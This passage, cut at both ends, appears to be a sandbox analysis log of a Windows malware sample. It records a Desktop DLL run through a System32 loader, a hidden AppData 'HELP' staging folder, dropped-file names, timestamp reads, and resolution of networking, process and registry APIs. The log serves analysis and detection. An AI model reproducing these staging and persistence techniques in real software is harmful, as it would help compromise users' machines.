(dwErrCode=0x0) [0031.167] GetLastError () returned 0x0 [0031.167] SetLastError (dwErrCode=0x0) [0031.167] GetLastError () returned 0x0 [0031.167] SetLastError (dwErrCode=0x0) [0031.167] GetLastError () returned 0x0 [0031.167] SetLastError (dwErrCode=0x0) [0031.167] GetLastError () returned 0x0 [0031.167] SetLastError (dwErrCode=0x0) [0031.167] GetLastError () returned 0x0 [0031.167] SetLastError (dwErrCode=0x0) [0031.167] GetLastError () returned 0x0 [0031.167] SetLastError (dwErrCode=0x0) [0031.167] GetLastError () returned 0x0 [0031.167] SetLastError (dwErrCode=0x0) [0031.167] GetLastError () returned 0x0 [0031.167] SetLastError (dwErrCode=0x0) [0031.167] GetLastError () returned 0x0 [0031.167] SetLastError (dwErrCode=0x0) [0031.167] GetLastError () returned 0x0 [0031.167] SetLastError (dwErrCode=0x0) [0031.167] GetLastError () returned 0x0 [0031.167] SetLastError (dwErrCode=0x0) [0031.167] GetLastError () returned 0x0 [0031.167] SetLastError (dwErrCode=0x0) [0031.167] GetLastError () returned 0x0 [0031.167] SetLastError (dwErrCode=0x0) [0031.167] GetLastError () returned 0x0 [0031.167] SetLastError (dwErrCode=0x0) [0031.167] GetLastError () returned 0x0 [0031.168] SetLastError (dwErrCode=0x0) [0031.168] GetLastError () returned 0x0 [0031.168] SetLastError (dwErrCode=0x0) [0031.168] GetLastError () returned 0x0 [0031.168] SetLastError (dwErrCode=0x0) [0031.168] GetLastError () returned 0x0 [0031.168] SetLastError (dwErrCode=0x0) [0031.168] GetLastError () returned 0x0 [0031.168] SetLastError (dwErrCode=0x0) [0031.168] GetLastError () returned 0x0 [0031.168] SetLastError (dwErrCode=0x0) [0031.168] GetLastError () returned 0x0 [0031.168] SetLastError (dwErrCode=0x0) [0031.168] GetLastError () returned 0x0 [0031.168] SetLastError (dwErrCode=0x0) [0031.168] GetLastError () returned 0x0 [0031.168] SetLastError (dwErrCode=0x0) [0031.168] GetLastError () returned 0x0 [0031.168] SetLastError (dwErrCode=0x0) [0031.168] GetLastError () returned 0x0 [0031.168] SetLastError (dwErrCode=0x0) [0031.168] GetLastError () returned 0x0 [0031.169] SetLastError (dwErrCode=0x0) [0031.169] GetLastError () returned 0x0 [0031.169] SetLastError (dwErrCode=0x0) [0031.169] GetLastError () returned 0x0 [0031.169] SetLastError (dwErrCode=0x0) [0031.169] GetLastError () returned 0x0 [0031.169] SetLastError (dwErrCode=0x0) [0031.169] GetLastError () returned 0x0 [0031.169] SetLastError (dwErrCode=0x0) [0031.169] GetLastError () returned 0x0 [0031.169] SetLastError (dwErrCode=0x0) [0031.169] GetLastError () returned 0x0 [0031.169] SetLastError (dwErrCode=0x0) [0031.169] GetLastError () returned 0x0 [0031.169] SetLastError (dwErrCode=0x0) [0031.169] GetLastError () returned 0x0 [0031.169] SetLastError (dwErrCode=0x0) [0031.169] GetLastError () returned 0x0 [0031.169] SetLastError (dwErrCode=0x0) [0031.169] GetLastError () returned 0x0 [0031.169] SetLastError (dwErrCode=0x0) [0031.169] GetLastError () returned 0x0 [0031.169] SetLastError (dwErrCode=0x0) [0031.169] GetLastError () returned 0x0 [0031.169] SetLastError (dwErrCode=0x0) [0031.169] GetLastError () returned 0x0 [0031.169] SetLastError (dwErrCode=0x0) [0031.169] GetLastError () returned 0x0 [0031.170] SetLastError (dwErrCode=0x0) [0031.170] GetLastError () returned 0x0 [0031.170] SetLastError (dwErrCode=0x0) [0031.170] GetLastError () returned 0x0 [0031.170] SetLastError (dwErrCode=0x0) [0031.170] GetLastError () returned 0x0 [0031.170] SetLastError (dwErrCode=0x0) [0031.170] GetLastError () returned 0x0 [0031.170] SetLastError (dwErrCode=0x0) [0031.170] GetLastError () returned 0x0 [0031.170] SetLastError (dwErrCode=0x0) [0031.170] GetLastError () returned 0x0 [0031.170] SetLastError (dwErrCode=0x0) [0031.170] GetLastError () returned 0x0 [0031.170] SetLastError (dwErrCode=0x0) [0031.170] GetLastError () returned 0x0 [0031.170] SetLastError (dwErrCode=0x0) [0031.170] GetLastError () returned 0x0 [0031.170] SetLastError (dwErrCode=0x0) [0031.170] GetLastError () returned 0x0 [0031.170] SetLastError (dwErrCode=0x0) [0031.170] GetLastError () returned 0x0 [0031.170] SetLastError (dwErrCode=0x0) [0031.170] GetLastError () returned 0x0 [0031.171] SetLastError (dwErrCode=0x0) [0031.171] GetLastError () returned 0x0 [0031.171] SetLastError (dwErrCode=0x0) [0031.171] GetLastError () returned 0x0 [0031.171] SetLastError (dwErrCode=0x0) [0031.171] GetLastError () returned 0x0 [0031.171] SetLastError (dwErrCode=0x0) [0031.171] GetLastError () returned 0x0 [0031.171] SetLastError (dwErrCode=0x0) [0031.171] GetLastError () returned 0x0 [0031.171] SetLastError (dwErrCode=0x0) [0031.171] GetLastError () returned 0x0 [0031.171] SetLastError (dwErrCode=0x0) [0031.171] GetLastError () returned 0x0 [0031.171] SetLastError (dwErrCode=0x0) [0031.171] GetLastError () returned 0x0 [0031.171] SetLastError (dwErrCode=0x0) [0031.171] GetLastError () returned 0x0 [0031.171] SetLastError (dwErrCode=0x0) [0031.171] GetLastError () returned 0x0 [0031.171] SetLastError (dwErrCode=0x0) [0031.171] GetLastError () returned 0x0 [0031.171] SetLastError (dwErrCode=0x0) [0031.171] GetLastError () returned 0x0 [0031.172] SetLastError (dwErrCode=0x0) [0031.172] GetLastError () returned 0x0 [0031.172] SetLastError (dwErrCode=0x0) [0031.172] GetLastError () returned 0x0 [0031.172] SetLastError (dwErrCode=0x0) [0031.172] GetLastError () returned 0x0 [0031.172] SetLastError (dwErrCode=0x0) [0031.172] GetLastError () returned 0x0 [0031.172] SetLastError (dwErrCode=0x0) [0031.172] GetLastError () returned 0x0 [0031.172] SetLastError (dwErrCode=0x0) [0031.172] GetLastError () returned 0x0 [0031.172] SetLastError (dwErrCode=0x0) [0031.172] GetLastError () returned 0x0 [0031.172] SetLastError (dwErrCode=0x0) [0031.172] GetLastError () returned 0x0 [0031.172] SetLastError (dwErrCode=0x0) [0031.172] GetLastError () returned 0x0 [0031.172] SetLastError (dwErrCode=0x0) [0031.172] GetLastError () returned 0x0 [0031.172] SetLastError (dwErrCode=0x0) [0031.172] GetLastError () returned 0x0 [0031.172] SetLastError (dwErrCode=0x0) [0031.172] GetLastError () returned 0x0 [0031.172] SetLastError (dwErrCode=0x0) [0031.172] GetLastError () returned 0x0 [0031.172] SetLastError (dwErrCode=0x0) [0031.172] GetLastError () returned 0x0 [0031.172] SetLastError (dwErrCode=0x0) [0031.172] GetLastError () returned 0x0 [0031.172] SetLastError (dwErrCode=0x0) [0031.172] GetLastError () returned 0x0 [0031.173] SetLastError (dwErrCode=0x0) [0031.173] GetLastError () returned 0x0 [0031.173] SetLastError (dwErrCode=0x0) [0031.173] GetLastError () returned 0x0 [0031.173] SetLastError (dwErrCode=0x0) [0031.173] GetLastError () returned 0x0 [0031.173] SetLastError (dwErrCode=0x0) [0031.173] GetLastError () returned 0x0 [0031.173] SetLastError (dwErrCode=0x0) [0031.173] GetLastError () returned 0x0 [0031.173] SetLastError (dwErrCode=0x0) [0031.173] GetLastError () returned 0x0 [0031.173] SetLastError (dwErrCode=0x0) [0031.173] GetLastError () returned 0x0 [0031.173] SetLastError (dwErrCode=0x0) [0031.173] GetLastError () returned 0x0 [0031.173] SetLastError (dwErrCode=0x0) [0031.173] GetLastError () returned 0x0 [0031.173] SetLastError (dwErrCode=0x0) [0031.173] GetLastError () returned 0x0 [0031.173] SetLastError (dwErrCode=0x0) [0031.173] GetLastError () returned 0x0 [0031.173] SetLastError (dwErrCode=0x0) [0031.173] GetLastError () returned 0x0 [0031.173] SetLastError (dwErrCode=0x0) [0031.173] GetLastError () returned 0x0 [0031.173] SetLastError (dwErrCode=0x0) [0031.173] GetLastError () returned 0x0 [0031.173] SetLastError (dwErrCode=0x0) [0031.173] GetLastError () returned 0x0 [0031.173] SetLastError (dwErrCode=0x0) [0031.174] GetLastError () returned 0x0 [0031.174] SetLastError (dwErrCode=0x0) [0031.174] GetLastError () returned 0x0 [0031.174] SetLastError (dwErrCode=0x0) [0031.174] GetLastError () returned 0x0 [0031.174] SetLastError (dwErrCode=0x0) [0031.174] GetLastError () returned 0x0 [0031.174] SetLastError (dwErrCode=0x0) [0031.174] GetLastError () returned 0x0 [0031.174] SetLastError (dwErrCode=0x0) [0031.174] GetLastError () returned 0x0 [0031.174] SetLastError (dwErrCode=0x0) [0031.174] GetLastError () returned 0x0 [0031.174] SetLastError (dwErrCode=0x0) [0031.174] GetLastError () returned 0x0 [0031.174] SetLastError (dwErrCode=0x0) [0031.174] GetLastError () returned 0x0 [0031.174] SetLastError (dwErrCode=0x0) [0031.174] GetLastError () returned 0x0 [0031.174] SetLastError (dwErrCode=0x0) [0031.174] GetLastError () returned 0x0 [0031.174] SetLastError (dwErrCode=0x0) [0031.174] GetLastError () returned 0x0 [0031.174] SetLastError (dwErrCode=0x0) [0031.174] GetLastError () returned 0x0 [0031.174] SetLastError (dwErrCode=0x0) [0031.174] GetLastError () returned 0x0 [0031.174] SetLastError (dwErrCode=0x0) [0031.174] GetLastError () returned 0x0 [0031.174] SetLastError (dwErrCode=0x0) [0031.175] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x761d0000 [0031.175] GetProcAddress (hModule=0x761d0000, lpProcName="IsProcessorFeaturePresent") returned 0x762276b5 [0031.175] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0031.176] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28f480 | out: lpSystemTimeAsFileTime=0x28f480*(dwLowDateTime=0xe04e0930, dwHighDateTime=0x1d3dfba)) [0031.176] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x28f3b8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0031.177] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x28f2a0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0031.177] GetLastError () returned 0x0 [0031.177] GetLastError () returned 0x0 [0031.177] GetLastError () returned 0x0 [0031.177] GetLastError () returned 0x0 [0031.177] GetLastError () returned 0x0 [0031.177] GetLastError () returned 0x0 [0031.177] GetLastError () returned 0x0 [0031.177] GetLastError () returned 0x0 [0031.177] GetLastError () returned 0x0 [0031.177] GetLastError () returned 0x0 [0031.177] GetLastError () returned 0x0 [0031.177] GetLastError () returned 0x0 [0031.177] GetLastError () returned 0x0 [0031.177] GetLastError () returned 0x0 [0031.177] GetLastError () returned 0x0 [0031.177] GetLastError () returned 0x0 [0031.177] GetLastError () returned 0x0 [0031.177] GetLastError () returned 0x0 [0031.177] GetLastError () returned 0x0 [0031.177] GetSystemDirectoryA (in: lpBuffer=0x72e0e74c, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0031.177] wsprintfA (in: param_1=0x72e0e74c, param_2="%s\\" | out: param_1="C:\\Windows\\system32\\") returned 20 [0031.177] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72e0e440, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0031.177] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72e0e134, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0031.177] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x72e0e238, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0031.177] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72e0e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0031.177] wsprintfA (in: param_1=0x72e0e648, param_2="%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP") returned 37 [0031.178] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help"), lpSecurityAttributes=0x0) returned 0 [0031.178] wsprintfA (in: param_1=0x72e0e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\") returned 47 [0031.178] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32"), lpSecurityAttributes=0x0) returned 0 [0031.178] GetLastError () returned 0xb7 [0031.178] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72e0e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0031.178] wsprintfA (in: param_1=0x72e0e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\") returned 38 [0031.178] wsprintfA (in: param_1=0x72e0e544, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\") returned 48 [0031.178] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x72e0e954 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0031.178] wsprintfA (in: param_1=0x28f120, param_2="%s%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0031.178] lstrlenA (lpString="C:\\Windows\\system32\\win.com") returned 27 [0031.178] wsprintfA (in: param_1=0x28f01c, param_2="%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0031.178] CreateFileA (lpFileName="C:\\Windows\\system32\\win.com" (normalized: "c:\\windows\\system32\\win.com"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0031.178] GetFileTime (in: hFile=0x74, lpCreationTime=0x72e0ec68, lpLastAccessTime=0x72e0ec70, lpLastWriteTime=0x72e0ec78 | out: lpCreationTime=0x72e0ec68*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastAccessTime=0x72e0ec70*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastWriteTime=0x72e0ec78*(dwLowDateTime=0x91a073c0, dwHighDateTime=0x1ca0410)) returned 1 [0031.178] CloseHandle (hObject=0x74) returned 1 [0031.178] GetLastError () returned 0x0 [0031.178] wsprintfA (in: param_1=0x72e0ea58, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb") returned 59 [0031.178] GetLastError () returned 0x0 [0031.178] wsprintfA (in: param_1=0x72e0eb5c, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx") returned 59 [0031.179] GetSystemDirectoryA (in: lpBuffer=0x28f120, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0031.179] CreateFileA (lpFileName="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0031.179] GetFileTime (in: hFile=0x74, lpCreationTime=0x72e1012c, lpLastAccessTime=0x72e10134, lpLastWriteTime=0x72e1013c | out: lpCreationTime=0x72e1012c*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastAccessTime=0x72e10134*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastWriteTime=0x72e1013c*(dwLowDateTime=0xe2a45800, dwHighDateTime=0x1cb887a)) returned 1 [0031.179] CloseHandle (hObject=0x74) returned 1 [0031.179] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x761d0000 [0031.179] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0031.179] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x77510000 [0031.180] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x761d0000 [0031.180] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76700000 [0031.181] LoadLibraryA (lpLibFileName="msvcrt.dll") returned 0x77720000 [0031.181] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77ad0000 [0031.181] GetProcAddress (hModule=0x77510000, lpProcName="WSAStartup") returned 0x77513ab2 [0031.181] GetProcAddress (hModule=0x77510000, lpProcName="WSACleanup") returned 0x77513c5f [0031.181] GetProcAddress (hModule=0x77510000, lpProcName="gethostbyname") returned 0x77527673 [0031.181] GetProcAddress (hModule=0x77510000, lpProcName="inet_ntoa") returned 0x7751b131 [0031.181] GetProcAddress (hModule=0x761d0000, lpProcName="CreateFileA") returned 0x7621cee8 [0031.181] GetProcAddress (hModule=0x761d0000, lpProcName="WriteFile") returned 0x76221400 [0031.181] GetProcAddress (hModule=0x761d0000, lpProcName="CloseHandle") returned 0x7621ca7c [0031.181] GetProcAddress (hModule=0x761d0000, lpProcName="FindFirstFileA") returned 0x76222d89 [0031.181] GetProcAddress (hModule=0x761d0000, lpProcName="FindNextFileA") returned 0x7621a187 [0031.181] GetProcAddress (hModule=0x761d0000, lpProcName="FindClose") returned 0x76220e62 [0031.181] GetProcAddress (hModule=0x761d0000, lpProcName="DeleteFileA") returned 0x762147cb [0031.181] GetProcAddress (hModule=0x761d0000, lpProcName="FileTimeToSystemTime") returned 0x76221dfe [0031.181] GetProcAddress (hModule=0x761d0000, lpProcName="SetFilePointer") returned 0x7621db36 [0031.181] GetProcAddress (hModule=0x761d0000, lpProcName="CreateProcessA") returned 0x761d2082 [0031.181] GetProcAddress (hModule=0x761d0000, lpProcName="WaitForSingleObject") returned 0x7621ba90 [0031.182] GetProcAddress (hModule=0x761d0000, lpProcName="ReadFile") returned 0x762196fb [0031.182] GetProcAddress (hModule=0x761d0000, lpProcName="CreateEventW") returned 0x76223386 [0031.182] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemDirectoryA") returned 0x76218fc5 [0031.182] GetProcAddress (hModule=0x761d0000, lpProcName="GetWindowsDirectoryW") returned 0x762104b6 [0031.182] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathA") returned 0x76236a65 [0031.182] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathW") returned 0x76208b33 [0031.182] GetProcAddress (hModule=0x761d0000, lpProcName="GetLocalTime") returned 0x7621a90e [0031.182] GetProcAddress (hModule=0x761d0000, lpProcName="GetComputerNameW") returned 0x762103ff [0031.182] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemInfo") returned 0x76223728 [0031.182] GetProcAddress (hModule=0x761d0000, lpProcName="GetVersionExW") returned 0x76213b1a [0031.182] GetProcAddress (hModule=0x761d0000, lpProcName="GetEnvironmentVariableA") returned 0x7621ce2e [0031.182] GetProcAddress (hModule=0x761d0000, lpProcName="CopyFileA") returned 0x7623532c [0031.182] GetProcAddress (hModule=0x761d0000, lpProcName="GetLastError") returned 0x7621bf00 [0031.182] GetProcAddress (hModule=0x761d0000, lpProcName="SetFileAttributesA") returned 0x76208cb9 [0031.182] GetProcAddress (hModule=0x761d0000, lpProcName="GetFileSize") returned 0x76210273 [0031.182] GetProcAddress (hModule=0x761d0000, lpProcName="CreateDirectoryA") returned 0x762368da [0031.182] GetProcAddress (hModule=0x761d0000, lpProcName="TerminateProcess") returned 0x76212331 [0031.182] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryW") returned 0x76223c01 [0031.183] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0031.183] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryA") returned 0x7622395c [0031.183] GetProcAddress (hModule=0x761d0000, lpProcName="MultiByteToWideChar") returned 0x7622452b [0031.183] GetProcAddress (hModule=0x76700000, lpProcName="RegCreateKeyExA") returned 0x76711469 [0031.183] GetProcAddress (hModule=0x76700000, lpProcName="RegEnumValueA") returned 0x7670cf49 [0031.183] GetProcAddress (hModule=0x76700000, lpProcName="RegDeleteValueA") returned 0x7672a4ea [0031.183] GetProcAddress (hModule=0x76700000, lpProcName="RegCloseKey") returned 0x7671469d [0031.183] GetProcAddress (hModule=0x77720000, lpProcName="memset") returned 0x77729790 [0031.183] GetProcAddress (hModule=0x77720000, lpProcName="memcpy") returned 0x77729910 [0031.183] GetProcAddress (hModule=0x77720000, lpProcName="memcmp") returned 0x77737975 [0031.183] GetProcAddress (hModule=0x77720000, lpProcName="malloc") returned 0x77729cee [0031.183] GetProcAddress (hModule=0x77720000, lpProcName="free") returned 0x77729894 [0031.183] GetProcAddress (hModule=0x77720000, lpProcName="strchr") returned 0x7772dbeb [0031.183] GetProcAddress (hModule=0x77720000, lpProcName="strncpy") returned 0x777308a9 [0031.183] GetProcAddress (hModule=0x77720000, lpProcName="atoi") returned 0x7772dbe0 [0031.183] GetProcAddress (hModule=0x77720000, lpProcName="_snwprintf") returned 0x777495d1 [0031.184] GetProcAddress (hModule=0x77720000, lpProcName="strncat") returned 0x77750909 [0031.184] GetProcAddress (hModule=0x77720000, lpProcName="strstr") returned 0x7772de4a [0031.184] GetProcAddress (hModule=0x77720000, lpProcName="strlen") returned 0x777343d3 [0031.184] GetProcAddress (hModule=0x77720000, lpProcName="strrchr") returned 0x7772dbae [0031.184] GetProcAddress (hModule=0x77720000, lpProcName="_snprintf") returned 0x7774fa7c [0031.184] GetProcAddress (hModule=0x77ad0000, lpProcName="OemToCharA") returned 0x77b2f041 [0031.184] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfA") returned 0x77ae3f47 [0031.184] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfW") returned 0x77af426d [0031.184] GetModuleFileNameA (in: hModule=0x72dd0000, lpFilename=0x72e0e134, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0031.184] GetModuleFileNameW (in: hModule=0x72dd0000, lpFilename=0x72e0e238, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0031.184] GetModuleFileNameA (in: hModule=0x72dd0000, lpFilename=0x72e0e440, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0031.184] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="97ryuhf023") returned 0x74 [0031.186] HeapDestroy (hHeap=0x5b0000) returned 1 Process: id = "8" image_name = "gorctexxzx.exe" filename = "c:\\windows\\system32\\gorctexxzx.exe" page_root = "0x7ef4f760" os_pid = "0xaac" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa3c" cmd_line = "\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=Entry" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 478 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 479 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 480 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 481 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 482 start_va = 0x11d0000 end_va = 0x11f0fff entry_point = 0x11d0000 region_type = mapped_file name = "gorctexxzx.exe" filename = "\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe") Region: id = 483 start_va = 0x77e80000 end_va = 0x77e80fff entry_point = 0x77e80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 484 start_va = 0x77ec0000 end_va = 0x77ffbfff entry_point = 0x77ec0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 485 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 486 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 487 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 488 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 489 start_va = 0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 490 start_va = 0x310000 end_va = 0x31ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 491 start_va = 0x330000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 492 start_va = 0x75f70000 end_va = 0x75fb9fff entry_point = 0x75f70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 493 start_va = 0x761d0000 end_va = 0x762a3fff entry_point = 0x761d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 494 start_va = 0x76300000 end_va = 0x76356fff entry_point = 0x76300000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 495 start_va = 0x765f0000 end_va = 0x765f9fff entry_point = 0x765f0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 496 start_va = 0x767a0000 end_va = 0x773e9fff entry_point = 0x767a0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 497 start_va = 0x773f0000 end_va = 0x7748cfff entry_point = 0x773f0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 498 start_va = 0x77550000 end_va = 0x775f0fff entry_point = 0x77550000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 499 start_va = 0x77720000 end_va = 0x777cbfff entry_point = 0x77720000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 500 start_va = 0x77970000 end_va = 0x77acbfff entry_point = 0x77970000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 501 start_va = 0x77ad0000 end_va = 0x77b98fff entry_point = 0x77ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 502 start_va = 0x77c80000 end_va = 0x77ccdfff entry_point = 0x77c80000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 503 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 504 start_va = 0x1c0000 end_va = 0x287fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 505 start_va = 0x762b0000 end_va = 0x762cefff entry_point = 0x762b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 506 start_va = 0x77ba0000 end_va = 0x77c6bfff entry_point = 0x77ba0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 507 start_va = 0x20000 end_va = 